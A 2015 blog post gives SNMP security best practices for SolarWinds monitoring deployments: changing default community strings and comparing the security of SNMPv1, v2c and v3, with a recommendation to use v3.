Friday, August 21, 2015

SNMP Security Considerations

In Chapter 1 of SolarWinds Server & Application Monitor: Deployment and Administration you will find a number of different tutorials on how to configure SNMP on your physical and virtual infrastructure. The intent of the book is to get SolarWinds up and running quickly with minimal hassle. As such, all procedures and examples reference SNMPv2c read-only community strings. As mentioned in the book, this post is an extension of Chapter 1, Deployment Strategy, to highlight some SNMP security considerations and best practices.

Community String Common Mistakes
More often than not, community strings are pre-configured on network devices with the following:
read-only: public
read-write: private
  • There is a significant security risk in leaving them as public and/or private. Change both of the default community strings to something secure.
  • Assign complex and secure community strings. Treat community strings as you would for passwords assigned to highly privileged accounts such as Domain Admin accounts. 
  • Do not remove a community string and leave it blank. It can be assumed that this, for example, disables read-write, but that is not accurate.
In 2000 the SANS (SysAdmin, Audit, Networking, and Security) Institute listed this common mistake in their top 10 critical security threats. Meaning this has been a problem for a long time, and it's astonishing how many organizations still have public and private set on a number of devices.

Version Breakdown
Presently, there are three SNMP versions SNMPv1, SNMPv2c, and SNMPv3. Which version should I use? The short answer is use SNMPv3 unless you absolutely have to use SNMPv2c and just don't use SNMPv1. Keep reading for the reasoning behind this.

Introduced in 1998. Do you still use Windows 98? No. So don't use SNMPv1. :)
  • Pros:
    • Easy to configure via community string based authentication.
    • Compatible with legacy devices.
  • Cons:
    • Plain text password (i.e. community string) with no encryption, meaning a simple packet sniffer could result in some of the subsequent cons.
    • Exposure of your internal network topology.
    • Unauthorized modification of system configuration data.
    • Manipulation of access control lists (ACL).
    • Denial-of-Service (DoS) attack vulnerability.
    • Format string attack vulnerability.
    • Buffer overflow attack vulnerability.
    • 32bit counters.
There are three variants of SNMPv2c, the other two being SNMPv2 and SNMPv2u. SNMPv2c is the only one listed in this version breakdown, as the other two were not widely adopted. Well... not adopted at all really, due to complexity (security), which unfortunately (unwisely) outweighed usability. SolarWinds uses SNMPv2c unless you explicitly choose SNMPv1 (let's not do that) or SNMPv3 (much better idea).
  • Pros:
    • Easy to configure via community string based authentication.
    • Widely compatible and adoptable.
    • Obviously, some improvements over SNMPv1; different message formats, a couple new commands (con actually as you will see below), and 64bit counters. 
  • Cons:
    • Plain text SNMPv1 style community string authentication, with no encryption.
    • All of the SNMPv1 security related cons...
    • The addition of the get-bulk-request command allows an intruder to grab the entire MIB OID subtree, introducing the risk of a Distributed Reflective Denial of Service (DRDoS) attack.
In this corner we finally have some security, weighing in at decent. SNMPv3 shares the same fundamental architecture as SNMPv1 and SNMPv2c. Note, I have a pending blog post to provide a guide for configuring SNMPv3 on a few different platforms.
  • Pros:
    • User-based Security Model (USM).
      • Hash-based authentication via message digest algorithm (MD5) or secret hash algorithm (SHA1), mitigating the risk involved with plain text community string authentication.
      • Encryption with Data Encryption Standard in Cipher Block Chaining mode (DES-CBC).
    • Some enhanced functional improvements over SNMPv2c in regards to the administrative framework.
  • Cons:
    • More complicated to configure and maintain, adding some administrative effort.
    • Only "weighing in at decent" security because:
      • DES is susceptible to brute force attacks.
      • No form of key management for the DES symmetric secret keys.
      • Debatable man-in-the-middle (MITM) attack vulnerability, mitigated by strong passwords.
    • Minor performance reduction when compared to earlier versions.
Do not let the cons of SNMPv3 deter you. It is still incredibly more secure than SNMPv1 and SNMPv2c. That said, if you're ambitious and want to kick it up a notch, then you may want to check out Net-SNMP.

No comments :

Post a Comment :